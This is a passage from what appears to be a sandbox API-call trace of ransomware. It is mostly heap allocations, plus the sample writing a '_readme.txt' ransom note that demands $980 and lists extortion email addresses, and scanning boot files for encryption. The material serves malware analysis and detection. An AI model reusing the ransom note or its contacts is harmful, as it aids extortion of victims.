dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.537] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0201.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.537] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.537] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.537] PathFindFileNameW (pszPath="") returned="" [0201.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.537] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.537] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.538] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.538] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.538] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0201.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.538] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0201.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.538] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.538] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.538] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.539] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.539] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.539] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0201.539] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0201.539] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.539] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.539] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.540] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.540] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.543] HeapFree (in: 